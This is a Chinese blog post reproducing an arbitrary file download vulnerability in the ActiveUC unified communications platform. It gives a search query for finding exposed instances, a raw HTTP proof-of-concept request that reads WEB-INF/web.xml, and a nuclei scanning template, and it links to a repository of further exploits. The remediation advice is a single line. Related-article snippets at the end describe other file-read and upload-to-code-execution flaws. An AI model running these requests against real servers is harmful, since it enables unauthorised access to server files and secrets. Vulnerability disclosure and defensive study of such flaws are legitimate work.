【漏洞复现】网动统一通信平台/网动统一通信平台ActiveUC存在任意文件下载

于 2024-10-08 17:57:26 发布
阅读量400 收藏 6
点赞数 9
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48368964/article/details/142765599
版权


》》》产品描述《《《

        网动统一通信平台是采用统一的通信界面,将VoIP电话系统、电子邮件等多种沟通方式融合的企业IT平台。

》》》漏洞描述《《《

        网动统一通信平台是采用统一的通信界面,将VoIP电话系统、电子邮件等多种沟通方式融合的企业IT平台。网动统一通信平台(ActiveUC)存在任意文件读取下载、未授权密钥泄露。

》》》搜索语句《《《

title="网动统一通信平台(Active UC)"

》》》漏洞复现《《《

poc

GET /acenter/meetingShow!downloadDocument.action?filePath=WEB-INF/web.xml HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Connection: close

yaml

id: 网动统一通信平台/网动统一通信平台ActiveUC存在任意文件下载漏洞

info:
  name: 
  author: Kelichen
  severity: 
  description: 

  
http:
  - raw:
      - |
        GET /acenter/meetingShow!downloadDocument.action?filePath=WEB-INF/web.xml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Upgrade-Insecure-Requests: 1
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<web-app"
          - "<servlet>"
          - "<servlet-mapping>"

》》》修复建议《《《

关闭互联网接口

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

A 八方
关注
专栏目录
基于vulhub平台漏洞复现环境Dockerfile设计源码
10-02
该项目是针对Vulhub平台漏洞复现环境设计的Dockerfile源码,包含2043个文件,涵盖多种编程语言和文件类型,其中包含495个PNG图片文件、399个Markdown文件、260个YAML文件、83个Java源文件、82个Python脚本文件、73...
厦门四信通信科技有限公司设备管理平台存在逻辑缺陷漏洞.doc
07-09
《厦门四信通信科技有限公司设备管理平台逻辑缺陷漏洞详解及防范措施》 厦门四信通信科技有限公司,作为中国物联网无线通信领域的领头羊,以其深厚的企业文化与创新技术,在智慧水利、水务信息化等多个领域有着显著...
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。
phpcmsv9.0任意文件上传漏洞解析
01-19
漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:...
eyoucms V1.0.4 后台任意文件读取漏洞1
08-03
### eyoucms V1.0.4 后台任意文件读取漏洞详解 #### 漏洞背景 易优CMS(eyoucms)是一款基于PHP+MySQL开发的企业级建站系统,广泛应用于中小企业的网站搭建。它支持多平台访问,包括PC端、移动端以及微信平台。...
Adminer≤4.6.2任意文件读取漏洞1
08-03
然而,在Adminer的某些旧版本,特别是≤4.6.2,存在一个严重的安全漏洞,允许恶意用户执行任意文件读取。 **0x02 漏洞原理** 该漏洞主要源于MySQL中的`LOAD DATA INFILE`命令的安全缺陷。`LOAD DATA INFILE`用于从...
漏洞复现是什么如何复现.txt
01-31
漏洞复现
漏洞复现是什么.txt
01-31
漏洞复现
阿里巴巴开源的FastJson 1反序列化漏洞复现流程
最新发布
10-04
包含RMI服务所需的内容和测试使用的攻击FastJson1反序列化漏洞的Java文件
vulhub漏洞复现 CVE-2016-3088
03-14
vulhub漏洞复现 CVE-2016-3088
漏洞复现的原理和解释.txt
01-31
漏洞复现
74cms v4.2.X任意文件读取漏洞
09-06
**74cms v4.2.X任意文件读取漏洞详解** 在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者通过特定的手段读取服务器上...
kkFileview-任意文件上传致远程代码执行漏洞复现
07-12
kkFileView是一个基于PHP的文件管理组件,它允许用户上传并查看文件。然而,在早期版本中存在一个严重的安全漏洞,即"任意文件上传至远程代码执行"漏洞。这个漏洞存在意味着攻击者可以利用该功能上传包含恶意脚本的文件,当其他用户或系统尝试访问这些文件时,恶意脚本会被执行,从而可能导致服务器权限提升或数据泄露。 复现漏洞的过程通常包括以下几个步骤: 1. 找到kkFileView的上传接口,这通常涉及到发送一个HTTP请求,指定一个URL和待上传的文件作为POST数据的一部分。 2. 准备一个包含恶意代码的文件(如php、asp等),例如`<?php echo 'your_code'; ?>`。 3. 发送POST请求,将准备好的恶意文件名传递给上传接口。 4. 被动监听目标服务器,观察是否有预期的输出结果或者异常信息,表明代码已成功执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值